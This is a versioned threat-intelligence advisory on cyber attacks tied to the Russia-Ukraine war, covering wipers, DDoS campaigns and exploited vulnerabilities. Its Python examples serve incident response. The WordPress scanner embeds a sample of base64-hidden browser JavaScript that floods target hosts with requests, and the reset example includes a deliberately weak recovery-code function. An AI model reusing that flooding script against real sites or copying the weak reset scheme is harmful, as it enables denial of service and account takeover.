Emerging Cyber Threats in the Ongoing Russia-Ukraine Conflict

Geopolitical Advisory

[10 May 2022, Version 13, NEW]
Docker Images Used by Pro-Ukraine Hackers to DDoS Russian Websites

This week researchers observed a wave of distributed denial-of-service (DDoS) attacks on Russian and Belarusian websites run by the two governments, their militaries, and media outlets.

Pro-Ukrainian threat actors, probably associated with Ukraine's IT Army, are suspected to be behind the attacks. Researchers note that the two Docker images used in them were deployed between February and March.

Sample analysis showed that one of the images deployed on the compromised Docker honeypot contains bombardier, a Go-based HTTP benchmarking tool (SHA256 6d38fda9cf27fddd45111d80c237b86f87cf9d350c795363ee016bb030bb3453), which floods a site with HTTP requests; a tool written for stress-testing is being repurposed as the DDoS engine.

Recommendations:

  • Monitor for and block the IOCs provided, and strengthen defenses based on the tactical intelligence provided.
  • Deploy an advanced endpoint protection solution that detects and prevents malware and malicious activity without relying solely on signature-based methods.
  • Implement a holistic security strategy covering attack surface reduction, effective patch management, active network monitoring with next-generation security solutions, and a ready-to-go incident response plan.
  • Consider Network Traffic Analysis (NTA) and Network Detection and Response (NDR) systems to cover the blind spots of EDR and SIEM solutions.
  • Run vulnerability scans and periodic audits to identify misconfigurations and missing patches.
  • Container hosts specifically: never expose the Docker daemon socket or API port to untrusted networks, and inventory running containers for images you did not deploy.
  • Install anti-APT and EDR solutions that provide threat discovery and detection, investigation, and timely remediation of incidents.

[29 April 2022, Version 12]
CERT-UA Warns of Ongoing DDoS Attacks

Ukraine's Computer Emergency Response Team (CERT-UA) has published an advisory warning of ongoing distributed denial-of-service (DDoS) attacks on government web portals and pro-Ukraine websites.

As per the advisory, threat actors are compromising WordPress-based websites and injecting malicious JavaScript into the HTML of the site's main files. The script is base64-encoded to evade detection; it runs in the browser of every visitor to the compromised site and generates a stream of requests to the target sites, so the compromised WordPress installations act as the attack's bot population without their owners knowing.
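To make the injection concrete, the following is an added Python example (not CERT-UA's code or tooling) that does what an incident responder would do on a suspect WordPress host: pull every inline script out of an HTML/PHP template, decode any long base64 literal, and report the hostnames the decoded JavaScript would hammer with fetch or XMLHttpRequest calls. The sample HTML, the .invalid target hostnames and the script body are constructed for the example.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed sample (not a real CERT-UA artefact): a theme file with an
# injected inline script whose body is base64 wrapped in eval(atob(...)).
INJECTED_JS = """
var targets = ["https://example-target.invalid/", "https://second-target.invalid/"];
setInterval(function () {
  targets.forEach(function (t) { fetch(t + "?" + Math.random(), {mode: "no-cors"}); });
}, 1000);
"""
SAMPLE_HTML = (
    '<!DOCTYPE html><html><head><title>Blog</title>\n'
    '<script>eval(atob("%s"));</script>\n'
    '</head><body><p>hello</p><script>var x = 1;</script></body></html>'
    % base64.b64encode(INJECTED_JS.encode()).decode()
)
# Constructed benign page: a long base64 literal that decodes to plain text.
HARMLESS_HTML = '<script>var s = "%s";</script>' % base64.b64encode(
    b"lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do").decode()

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
# A quoted run of 40+ base64 characters; short literals are ignored to cut noise.
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Decoded payloads only count if they can generate requests from a browser.
REQUEST_API_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b")


def decode_blobs(script_body):
    """Yield the decoded text of every long base64 literal in a script body."""
    for m in B64_RE.finditer(script_body):
        try:
            yield base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue


def find_injected_targets(html):
    """Return the sorted hostnames that base64-wrapped inline scripts would flood."""
    hosts = set()
    for script in SCRIPT_RE.findall(html):
        for decoded in decode_blobs(script):
            if REQUEST_API_RE.search(decoded):
                for url in URL_RE.findall(decoded):
                    host = urlparse(url).hostname
                    if host:
                        hosts.add(host)
    return sorted(hosts)


def scan_files(paths):
    """Map each file path to the targets found in it; unreadable files are skipped."""
    report = {}
    for path in paths:
        try:
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_injected_targets(fh.read())
        except OSError:
            continue
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    print(find_injected_targets(SAMPLE_HTML))
```

Run scan_files over the web root, wp-content/themes and the active theme's header/footer templates; any result is a site that is already being used as a DDoS source and the hostnames map directly onto the target list below. The 40-character floor and the request-API filter keep short base64 strings (inline icons, nonces) out of the report.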

Some of the targeted websites include:

  • kmu.gov.ua (Ukrainian government portal)
  • callrussia.org (project to raise awareness in Russia)
  • gngforum.ge (inaccessible)
  • secjuice.com (infosec advice for Ukrainians)
  • liqpay.ua (inaccessible)
  • gfis.org.ge (inaccessible)
  • playforukraine.org (play-based fundraiser)
  • war.ukraine.ua (news portal)
  • micro.com.ua (inaccessible)
  • fightforua.org (international enlistment portal)
  • edmo.eu (news portal)
  • ntnu.no (Norwegian university site)
  • megmar.pl (Polish logistics firm)

Recommendations:

  • Deploy DDoS-capable network hardware that can absorb known attack types, and enable the protections it offers for network resources. Extra capacity will not prevent a DDoS attack, but it lessens the impact.
  • Use a DDoS protection provider with cloud scrubbing so that most attack traffic is removed before it reaches your network.
  • Keep your website's content management system (CMS) up to date.
  • Use the latest available version of every active plugin, and remove plugins you no longer need.
  • Restrict access to the website's administration pages.
  • Monitor theme and core files for unauthorized changes: the injection described above lives in the site's own HTML, so file-integrity checks on the web root catch it before the site's visitors are turned into attack traffic.

[22 April 2022, Version 11]
Joint Advisory Released by US and Allied Cybersecurity Authorities

A recent advisory was released by the cyber authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom to warn organizations about the Russian state-sponsored and criminal cyber threats to critical infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) authored “Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure” in partnership with the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), National Cyber Security Centre New Zealand (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) and National Crime Agency (NCA), and with contributions from industry members of CISA’s Joint Cyber Defense Collaborative.

According to the advisory, Russia's invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity, potentially in response to the unprecedented economic costs imposed on Russia and the material support provided by the United States and its allies and partners.

Final Takeaways:

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed because vulnerabilities are one of the top attack vectors.
  • Use multi-factor authentication (MFA) to mitigate credential theft and prevent attacker access. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts.
  • Secure and monitor remote desktop protocol and other risky services.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

[19 April 2022, Version 10]
Ukraine’s Energy Provider Targeted by Industroyer2 Malware

Energy providers in Ukraine have been targeted by a new variant of the Industroyer malware, dubbed Industroyer2. The Sandworm threat actor (attributed by Western governments to Russia's military intelligence service, the GRU) is suspected to be behind the attack. Working with CERT-UA, researchers found that Sandworm attempted to deploy Industroyer2 against Ukrainian high-voltage electrical substations. Alongside Industroyer2 the group used other malware families, including CaddyWiper, ORCSHRED, SOLOSHRED, and AWFULSHRED. At this point, researchers know neither the initial access vector nor how the threat actor moved from the IT network into the ICS network.

Final Takeaway:

  • By comparing the compilation timestamp of Industroyer2 with the scheduled task entry created on an infected host, researchers assess that the threat actor prepared the attack at least two weeks in advance.
  • Researchers assess with high confidence that Industroyer2 is built from the same source code as Industroyer. The new variant is highly configurable, but its detailed configuration is hardcoded in the binary rather than stored in an .INI file as Industroyer's was. Because this configuration drives everything the malware does, the attackers have to recompile Industroyer2 for each new victim or environment; researchers do not expect this limitation to hinder Sandworm.
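The lead-time assessment above rests on two timestamps: the COFF TimeDateStamp in the PE header of the sample and the trigger time of the scheduled task that launched it. The following is an added Python example, not ESET or CERT-UA code: it builds a constructed minimal PE header, reads the timestamp the way a triage script would, and computes the lead time against a task trigger. The compile and trigger times are illustrative assumptions consistent with "at least two weeks", not values taken from this advisory.

```python
import struct
from datetime import datetime, timezone


def build_sample_pe(compile_ts):
    """Construct a minimal, non-executable PE header whose COFF TimeDateStamp
    is compile_ts. Constructed test artefact only; not a malware sample."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)           # e_lfanew -> PE signature
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 0, compile_ts, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


def pe_compile_time(data):
    """Return the COFF TimeDateStamp of a PE file as an aware UTC datetime."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    (ts,) = struct.unpack_from("<I", data, e_lfanew + 8)  # TimeDateStamp follows Machine+NumberOfSections
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def lead_time_days(pe_bytes, task_trigger):
    """Days between the binary's compile time and the scheduled task's trigger time."""
    return (task_trigger - pe_compile_time(pe_bytes)).total_seconds() / 86400


# Illustrative assumptions consistent with "at least two weeks"; not values from the advisory.
SAMPLE_COMPILE = datetime(2022, 3, 23, 10, 7, 29, tzinfo=timezone.utc)
SAMPLE_TASK_TRIGGER = datetime(2022, 4, 8, 16, 10, 0, tzinfo=timezone.utc)
SAMPLE_PE = build_sample_pe(int(SAMPLE_COMPILE.timestamp()))

if __name__ == "__main__":
    print("compiled:", pe_compile_time(SAMPLE_PE).isoformat())
    print("lead time: %.1f days" % lead_time_days(SAMPLE_PE, SAMPLE_TASK_TRIGGER))
```

The trigger time comes from the task's XML under C:\Windows\System32\Tasks or from Event ID 4698 in the Security log. Treat the compile timestamp as attacker-controlled: it is a plain 32-bit field that a build system or the operator can set to anything, so it only supports a lead-time estimate when it agrees with other evidence such as the task creation event, file creation times and network telemetry.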

Recommendations:

  • Monitor for and block the IOCs provided, and strengthen defenses based on the tactical intelligence provided.
  • Block exploit-like behavior. Monitor endpoint memory for behavioral patterns typical of exploitation, such as unusual process handle requests; these patterns are common to most exploits, known or new, and identifying them protects against zero-day and critical exploits.
  • Deploy a unified threat management strategy, including malware detection, deep learning neural networks, and anti-exploit technology, combined with vulnerability and risk mitigation processes.
  • Take advantage of global CTI feeds that give security teams insight into threat actor activity and detection and mitigation techniques.
  • Maintain backups of critical systems, keep at least one copy offline or otherwise out of reach of domain credentials, and test restoration; wipers such as CaddyWiper are deployed with domain-level access and will reach any backup the domain can.
  • Employ robust endpoint security that lets your IT team identify what confidential information is being stolen, when, and through which channel or device.

[05 April 2022, Version 9]
AcidRain: The Newest Wiper Malware in the Russia-Ukraine Crisis

Following the multifaceted and deliberate cyberattack on Viasat's KA-SAT network, researchers have discovered a new wiper named AcidRain, an ELF binary for MIPS that wipes modems and routers.

Viasat has confirmed that a wiper was used in the attack on its modems on the 24th of February. According to researchers, AcidRain destroys data on a compromised device by overwriting its files, leaving the device unusable once the wiping completes. AcidRain is the seventh wiper attributed to Russia in the ongoing war with Ukraine, after WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero.

Some researchers in the threat intelligence community believe this wiper was designed specifically for attacks in Ukraine, though there is no clear evidence of that at the moment.

[04 April 2022, Version 8]
As per the recent incident report released by Viasat, on 24th February 2022 “a multifaceted and deliberate cyberattack” was launched against its KA-SAT network which led to a partial interruption of KA-SAT’s consumer-oriented satellite broadband service. The company has confirmed that the cyber attack did impact several thousand customers located in Ukraine and tens of thousands of other fixed broadband customers across Europe.

According to Viasat, the incident was localized to a consumer-focused partition of the KA-SAT network. High volumes of focused, malicious traffic were detected emanating from several SurfBeam2 and SurfBeam 2+ modems and/or associated customer premise equipment (CPE) physically located within Ukraine and serviced by one of the KA-SAT consumer-oriented network partitions. This targeted denial of service attack made it difficult for many modems to remain online.

The cyber attackers leveraged “a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network.”

Final Takeaway:

  • Viasat has not named a suspected threat actor or country of origin. Yet, as per our cyber threat intelligence team, a link between this attack on Ukrainian users and the ongoing Russia-Ukraine crisis cannot be ruled out. Such attacks could be retaliation by pro-Russian groups against the US and its allies for the sanctions imposed on Russia.
  • Vulnerable VPN appliances have emerged as one of the most common attack vectors. Beyond their use for DoS attacks and malware implants, ransomware groups have leveraged them for double extortion. Note that Viasat describes a misconfiguration rather than a software vulnerability: patching alone would not have closed this path, which is why the hardening steps below go beyond upgrading.

Recommendations:

  • Implement an advanced endpoint protection solution (EDR) that detects and prevents malicious activity without relying on signature-based detection methods.
  • Establish a robust security posture layered with a series of security mechanisms and controls in the network to protect the confidentiality, integrity, and availability of critical data.
  • If a vulnerable version was running at any point in time, disable all VPNs (SSL-VPN or IPsec) until the following remediation steps have been taken:
      • Immediately upgrade to the latest available release.
      • Regardless of the upgrade, reset user passwords.
      • Treat all credentials as potentially compromised and initiate an organization-wide password reset.
      • Inform users of the reset and explain the reason.
      • Leverage third-party credential leak monitoring services.

[ 31 March 2022, Version 7]
Five weeks into the Russia-Ukraine war, its cybersecurity repercussions are being felt across much of the world.

Here is a timeline of the major events in the Russia-Ukraine crisis:

30 March 2022

  • Viasat Confirms Cyberattack: The U.S.-based satellite internet provider, Viasat confirmed a ‘multifaceted and deliberate cyberattack’ which was limited to European customers, including several thousand located in Ukraine.
  • Gamaredon Targets NATO: The Russian APT group Gamaredon was observed phishing accounts of NATO and Eastern European militaries, in addition to existing campaigns against American NGOs, a Ukrainian defense contractor, and a Balkan military.

29 March 2022

Russian Hackers Scan US Energy Systems: As per the FBI, Russian state-sponsored actors pose a "current" threat to American national security, with Russian hackers scanning the systems of energy companies and other critical infrastructure.

28 March 2022
Ukrtelecom Hit by Cyberattack: Ukraine's state-owned telecommunications company experienced a "powerful" cyberattack, which was eventually repelled, according to Ukrainian government officials and company representatives.

24 March 2022
SAP out of Russia: German business software giant SAP shut its cloud operations in Russia.

22 March 2022
5 US Energy Firms Scanned: FBI releases an advisory on hackers associated with Russian internet addresses who have been scanning the networks of five US energy companies in a possible prelude to hacking attempts.

21 March 2022
Need to Strengthen US Healthcare Cybersecurity: The Department of Health and Human Services urged healthcare organizations to review and bolster their defenses against possible fallout from the Russian invasion of Ukraine.

18 March 2022
SaintBear Targets Ukraine: Ukraine is being targeted with fake translation software by the suspected threat actor UAC-0056 aka SaintBear. The threat actor has been observed to be deploying Cobalt Strike, GrimPlant, and GraphSteel.

15 March 2022
CaddyWiper Targets Ukraine: A new wiper observed targeting Ukraine, designed to wipe data across the Windows domains it is deployed on.

14 March 2022
Rise in Phishing Attacks: Since the Russian invasion, Ukraine has seen a rise in phishing emails as the primary attack vector for scams and for delivering malware (including, but not limited to, Remote Access Trojans/RATs).

13 March 2022
Rosneft Hit by Cyberattack: The Russian Energy company’s German subsidiary suffered cyberattacks.

11 March 2022
Series of DDoS Attacks on Russian Websites: Russian company websites were hit by increased hacking attempts.
Broadband Cyberattacks Disrupted: Western intelligence agencies investigate unidentified hackers who disrupted the broadband satellite Internet access in Ukraine.

8 March 2022
ISPs Quit Russia: Internet service providers Cogent Communications and Lumen Technologies stopped their internet services in Russia.

7 March 2022
IsaacWiper Launched on Ukraine: Data wiper malware named “IsaacWiper” – suspected to be part of Russian sabotage arsenal, deployed on Ukrainian government infrastructure.

2 March 2022
Patriotic Emotions Get the Better of the Conti Ransomware Group: A new Twitter account named "Contileaks" emerged, suspected to be created by a pro-Ukraine member of the ransomware group, and under the banner "Glory to Ukraine" leaked what our threat intelligence team regards as highly sensitive internal information.

1 March 2022
Russian Power Grid and Railways Targeted: In an attempt to strike back at Russia over its invasion of Ukraine, a Ukraine-based cyber guerrilla group plans digital sabotage attacks against critical Russian infrastructure.

28 February 2022
FoxBlade Trojan Launched on Ukraine: Hours before the Russian invasion, Ukraine witnessed a cyberattack by FoxBlade – a trojan that has DDoS capabilities.

27 February 2022
US Banks Gear Up for Cyberattacks: After the sanctions on Russia, US banks strengthen their cyber defenses in anticipation of retaliatory cyberattacks from Russia.

26 February 2022
Internet Shut Down in Ukraine: As Russian troops advanced in Ukraine, the country faces a major internet knockout.
Official Russian Website Offline: As several Russian governments and state media websites suffered DDoS attacks, the official website of the Kremlin went offline.

25 February 2022
Conti Sides with Russia: In the emerging Russia-Ukraine crisis, the Conti ransomware group sides with Russia and vows to "retaliate in case the Western warmongers attempt to target critical infrastructure in Russia."
Ukrainian Personnel Attacked by Phishing Attacks: Belarus-based hackers launch phishing attacks targeting Ukrainian military personnel.

24 February 2022
Russian Government Websites Down: The websites of the Russian government, State Duma, and Russian President were intermittently unavailable in Russia and Kazakhstan.
Ukraine Calls on Hacker Underground: Ukrainian Government called for support from hackers underground to conduct espionage against Russia and protect critical infrastructure.

23 February 2022
Sandworm Malware Targets Linux Network Devices: UK and US agencies issued a joint advisory on new malware from the Russian APT group Sandworm that targets Linux-based network devices.
Ukraine Attacked by Wiper Malware: Ukrainian enterprises were hit by a new wiper malware, which was also observed in Latvia and Lithuania.

18 February 2022
Ukraine Suffers SMS Spam and DoS Attacks: Cyber Officials in the US found evidence of massive DoS and SMS Spam campaigns in Ukraine – originating in Russia.

11 January 2022
Joint Alert Released on Cyberattacks: The National Security Agency, the Cybersecurity and Infrastructure Security Agency (CISA), and the FBI released a joint alert warning of ongoing targeted attacks by Russian state-sponsored cyber operators.

[ 18 March 2022, Version 6]
As per our Cyber Threat Intelligence Team Ukraine is being targeted with fake translation software by the suspected threat actor UAC-0056 aka SaintBear. The threat actor has been observed to be deploying Cobalt Strike, GrimPlant, and GraphSteel.

We believe that UAC-0056 was behind the WhisperGate activity which impacted the Ukrainian government agencies. As per our research, the threat actor was perhaps building on the GrimPlant and GraphSteel campaign since December 2021.

After compromising the target organization, the GraphSteel variant executes a set of reconnaissance and credential-harvesting commands.

[ 15 March 2022, Version 5]
In line with CYFIRMA's Cyber Security Predictions for 2022, the world is witnessing ongoing hybrid warfare against nations and their critical infrastructure. The Russia-Ukraine crisis started with a wave of cyberattacks in which data-wiping malware was used as a potent tool against Ukraine.

The newest malware in this chain is "CaddyWiper", designed to wipe data across the Windows domains it is deployed on. What sets it apart is the way the attackers keep their access to a compromised network while still heavily disrupting operations by wiping other critical devices: the wiper calls DsRoleGetPrimaryDomainInformation() to check whether the device is a domain controller and, if it is, leaves its data alone. The domain controllers that stay up are what let the attackers keep pushing the wiper to the rest of the domain.

At the code level CaddyWiper shares nothing with the wipers used before Russia's physical invasion of Ukraine, but its deployment closely resembles HermeticWiper's: sample analysis shows that, like HermeticWiper, CaddyWiper was pushed out via Group Policy (GPO), which means the attackers already controlled the target's Active Directory beforehand.

[ 14 March 2022, Version 4]
Like any global conflict, the Russia-Ukraine crisis has opened the door for opportunistic threat actors. Exploiting public sentiment for financial gain is nothing new among cybercriminals and was seen during several earlier global crises, including the Covid-19 pandemic.

Our Cyber Threat Intelligence team has observed a sharp rise in phishing emails as the primary attack vector for scams and malware delivery (including, but not limited to, Remote Access Trojans/RATs). In particular, several Business Email Compromise (BEC) campaigns have been seen since the Russian invasion. Most of these emails deliver commodity malware such as Remcos RAT, distributed in bulk across the target landscape. Threat actors are also exploiting existing vulnerabilities in Microsoft Office to implant malware: CVE-2017-11882, a "Microsoft Office Memory Corruption Vulnerability" in the legacy Equation Editor component (EQNEDT32.EXE), is still being successfully used by cybercriminals to run arbitrary code on systems that never received the 2017 patch, because it needs no macros and no user interaction beyond opening the document.
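Because CVE-2017-11882 sits in the Equation Editor OLE server, any document that embeds an Equation object deserves a second look whether or not it exploits anything. The following is an added Python triage example, not this advisory's tooling: it checks raw bytes for the Equation Editor CLSID, the Equation.2/Equation.3 ProgID and the "Equation Native" stream name, and for RTF it first hex-decodes the \objdata blobs, which is where the embedded object actually lives. The sample RTF is constructed for the example and is not an exploit document.

```python
import re
import uuid

# CLSID of the "Microsoft Equation 3.0" OLE server (EQNEDT32.EXE), the
# component patched for CVE-2017-11882.
EQUATION_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
CLSID_BYTES = EQUATION_CLSID.bytes_le                       # on-disk GUID byte order
PROGID_RE = re.compile(rb"Equation\.[23]")                  # ProgID used in \objclass / OLE streams
STREAM_NAMES = (b"Equation Native", "Equation Native".encode("utf-16-le"))
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")   # hex body of {\*\objdata ...}


def rtf_hex_payloads(data):
    """Decode every \\objdata hex blob of an RTF file into raw bytes."""
    out = []
    for m in OBJDATA_RE.finditer(data):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]                            # tolerate a dangling nibble
        try:
            out.append(bytes.fromhex(hexstr.decode("ascii")))
        except ValueError:
            continue
    return out


def equation_editor_indicators(data):
    """Return human-readable reasons why a document references the Equation
    Editor OLE server. Scans the raw bytes (OLE2 / unpacked OOXML parts) and,
    for RTF, the hex-decoded \\objdata blobs where the real object lives."""
    hits = []
    blobs = [data]
    if data.startswith(b"{\\rtf"):
        blobs += rtf_hex_payloads(data)
    for i, blob in enumerate(blobs):
        where = "raw" if i == 0 else "objdata#%d" % i
        if CLSID_BYTES in blob:
            hits.append("%s: Equation Editor CLSID %s" % (where, EQUATION_CLSID))
        progid = PROGID_RE.search(blob)
        if progid:
            hits.append("%s: ProgID %s" % (where, progid.group().decode()))
        if any(name in blob for name in STREAM_NAMES):
            hits.append("%s: 'Equation Native' stream name" % where)
    return hits


# Constructed sample RTF (not a real exploit document): an embedded object
# declared as Equation.3 whose hex payload carries the CLSID and stream name.
_FAKE_OBJDATA = b"\x01\x05\x00\x00" + CLSID_BYTES + STREAM_NAMES[1] + b"\x00" * 8
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
              b"{\\*\\objdata " + _FAKE_OBJDATA.hex().encode() + b"}}}")
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for line in equation_editor_indicators(SAMPLE_RTF):
        print(line)
```

Hits are indicators, not verdicts: legitimate documents from older Office versions carry Equation 3.0 objects, and attackers obfuscate RTF with control-word tricks that this simple decoder will not untangle, so use the output to prioritise what goes to a sandbox. The durable fix is on the endpoint: Microsoft removed the Equation Editor in January 2018, so a fully patched Office has nothing for this document to exploit.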

[ 04 March 2022, Version 3]
As Russia bombs major Ukrainian cities, more intelligence on the series of cyberattacks that preceded the invasion has emerged. Our threat intelligence team has observed a new data wiper named "IsaacWiper", which it believes was part of the Russian sabotage arsenal and which was deployed on Ukrainian government infrastructure not hit by HermeticWiper.

While the first IsaacWiper incident was observed on the 24th of February, there is substantial evidence that a new version of the wiper was dropped on February 25th. Our hypothesis is that the second version was deployed because the first failed to wipe part of the target infrastructure; the log messages added to it let the operators track how the malware interacted with the attacked assets.

Apart from IsaacWiper, researchers have found new samples signed with the Hermetica Digital Limited certificate, which they named HermeticWizard. This component discovers machines on the local network by gathering local IP addresses, and its end goal appears to be dropping and executing HermeticWiper on them.

Furthermore, our threat intelligence team has also identified additional TTPs of Conti Ransomware being leveraged in the ongoing conflict.

[ 02 March 2022, Version 2]
Patriotic Emotions Gets the Better of Conti Ransomware Group

The announcement of "full support" for the Russian invasion of Ukraine by the notorious Conti ransomware group seems to have stirred patriotic feelings in a member of the gang or a security researcher of Ukrainian origin.

The result? Three days after the attack on Ukraine, on the 27th of February, a new Twitter account named "Contileaks" emerged. The account, suspected to be created by a pro-Ukraine member of the ransomware group, leaked under the banner "Glory to Ukraine" what our threat intelligence team regards as highly sensitive internal information. The data not only gives an inside view of Conti's workings since January 29, 2021, but also exposes TTPs that other cybercriminal groups can leverage in the coming months.

[ 26 February 2022, Version 1]
Objective: Unauthorized Access, Cyber Espionage, Data Exfiltration, Payload Delivery, Defense Evasion, Defacement, Hybrid Warfare.

Type of Attack: Spear-Phishing, Impersonation, Malware Implant/ Data Wiper Malware, Smishing, BGP Hijacking, DDoS (Distributed Denial-of-Service), Vulnerabilities & Exploits (October CMS).

Target Technology: Microsoft Windows, Linux, Web Applications.

Target Geography: Ukraine, Global.

Target Industry: Government, Defence, Utilities, Energy, Transportation Infrastructure, Diversified Financials, Critical Infrastructure.

Suspected Vulnerability Leveraged: CVE-2021-32648 (CVSS Score: 9.1).

Suspected Threat Actors: Gamaredon, Ghostwriter, MuddyWater, Unknown Russian Threat Actors.

Malware: WhisperGate, HermeticWiper.

Business Impact Analysis: Data Loss, Operational Disruption, Reputational Damage, Geopolitical Risk.

Reported Date: February 26, 2022.

SUMMARY: As this article is being written, Russia has launched a full-scale invasion of Ukraine. Ukraine, for years a testing ground for cyberweaponry, has now become a textbook case of how cyberattacks are used in hybrid warfare.

While cyber offensives and the use of state-sponsored threat actors are nothing new to either Russia or Ukraine (they can be traced back to 2005), the cocktail of attacks launched by Russian intelligence before the invasion highlights how geopolitical issues can snowball into a crippling effect on critical infrastructure and state machinery.

Recent Cyber Escalations in Ukraine:
Since October 2021, our cyber threat intelligence team has observed a trail of spear-phishing campaigns targeting organizations and entities connected with Ukrainian affairs – ranging from government agencies, defense bodies, judiciary, moving on to NGOs and humanitarian aid bodies.

These campaigns were tracked down to be cyber-espionage operations launched by Gamaredon, aimed at exfiltrating sensitive data, gaining access to critical infrastructure, maintaining persistence, and following it up with lateral movement.

Linked to Russia's domestic intelligence service (FSB), Gamaredon used remote template injection to evade detection and to control how and when the malicious components of its phishing emails are delivered: the attached document itself is clean and only fetches the malicious template from an attacker-controlled server when opened. The attachments carried first-stage payloads which, once downloaded, execute further payloads. The initial staging components include (but are not limited to) obfuscated VBScripts, obfuscated PowerShell commands, LNK files, and self-extracting archives.

While the clarity on multiple subsequent staging scripts is limited, there is a fair possibility staging VBScripts were deployed for defense evasion and to execute Command-&-Control (C2) changes.

Fast-forward to 2022: on January 13, a destructive malware operation masquerading as a ransomware attack hit more than 70 Ukrainian government websites. While the defacement messages were political in nature, the aim of the malware, which overwrites the Master Boot Record, was to corrupt the data of the target infrastructure.

According to researchers, this three-stage Master Boot Record (MBR) wiper belongs to a new malware family named WhisperGate. Ukrainian officials also suggested that the Log4j vulnerability may have been used for initial access, though this was not confirmed. While the modus operandi of WhisperGate resembles VOODOO BEAR's NotPetya, researchers observe no technical overlap between the two.

Though no clear attribution was made in this attack, Ukrainian officials did suspect Ghostwriter – a Belarusian threat actor group – to be responsible for this attack.

Around the same time, a vulnerability in October CMS (CVE-2021-32648) was leveraged by threat actors to gain access to Ukrainian government websites. The vulnerability is a flaw in the october/system package: by sending a specially crafted request, an attacker could request a password reset for an account and then take over that account.

As per our threat intelligence team, the vulnerability exists because of a weak password recovery mechanism (CWE-640: Weak Password Recovery Mechanism for Forgotten Password, and CWE-287: Improper Authentication) and impacts confidentiality and integrity.
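CWE-640 is worth spelling out, since "request a reset, then take over the account" is exactly what a recovery flow exists to prevent. The following is an added Python example; it is not October CMS code (which is PHP) and not a reconstruction of the CVE-2021-32648 fix. It puts a deliberately weak recovery code beside a hardened flow with the properties a reset needs: an unguessable token, only the token's hash stored server-side, binding to one account, an expiry, single use, and constant-time comparison. The clock injection exists so expiry can be tested without waiting.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60            # seconds a reset link stays valid
PBKDF2_ROUNDS = 200_000


def weak_reset_code(user_id, now):
    """ANTI-PATTERN (CWE-640): a recovery code derived from public data. Anyone who
    knows the username and roughly when the reset was requested can reproduce it,
    and nothing ever expires it. The hash function is irrelevant: the input is guessable."""
    return hashlib.sha256(("%s:%d" % (user_id, int(now) // 60)).encode()).hexdigest()


class PasswordResetService:
    """Hardened recovery flow: unguessable token, only its hash stored server-side,
    bound to one account, time-limited, single-use, constant-time comparison."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}     # user_id -> (sha256(token), expires_at)
        self.passwords = {}    # user_id -> (salt, pbkdf2 hash); toy store for the example

    @staticmethod
    def _token_hash(token):
        return hashlib.sha256(token.encode()).digest()

    def request_reset(self, user_id):
        token = secrets.token_urlsafe(32)                    # 256 bits from the OS CSPRNG
        self._pending[user_id] = (self._token_hash(token), self._clock() + TOKEN_TTL)
        return token                                         # delivered only to that user's mailbox

    def consume(self, user_id, token, new_password):
        """Return True and set the new password only if every check passes."""
        entry = self._pending.get(user_id)
        if entry is None:
            return False                                     # no outstanding reset for this account
        token_hash, expires_at = entry
        if self._clock() > expires_at:
            del self._pending[user_id]
            return False                                     # expired; the user must request again
        if not hmac.compare_digest(token_hash, self._token_hash(token)):
            return False                                     # wrong token; entry stays for the real user
        del self._pending[user_id]                           # single use
        salt = secrets.token_bytes(16)
        digest = hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, PBKDF2_ROUNDS)
        self.passwords[user_id] = (salt, digest)
        return True
```

In a real deployment the reset endpoint must also respond identically whether or not the account exists, rate-limit requests per account and per source, and invalidate existing sessions once the password changes; none of that is shown here.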

It was the breach of Belarusian Railway's computer systems by hacktivists that added a real-world kinetic angle to the earlier cyber offensive activity. The group gained access to the railway's control systems, which would allow it to shut systems down and potentially cause accidents.

This series of cyberattacks reached its high point on the 23rd of February, when a new set of malware samples was observed making inroads into Ukrainian infrastructure. The new malware, named HermeticWiper after the name on its code-signing certificate, is a custom-written application that, like WhisperGate, wipes Windows devices and corrupts the MBR so that they fail to boot. Rather than writing to disk itself, it abuses a legitimate, signed partition-management driver to carry out the sabotage.

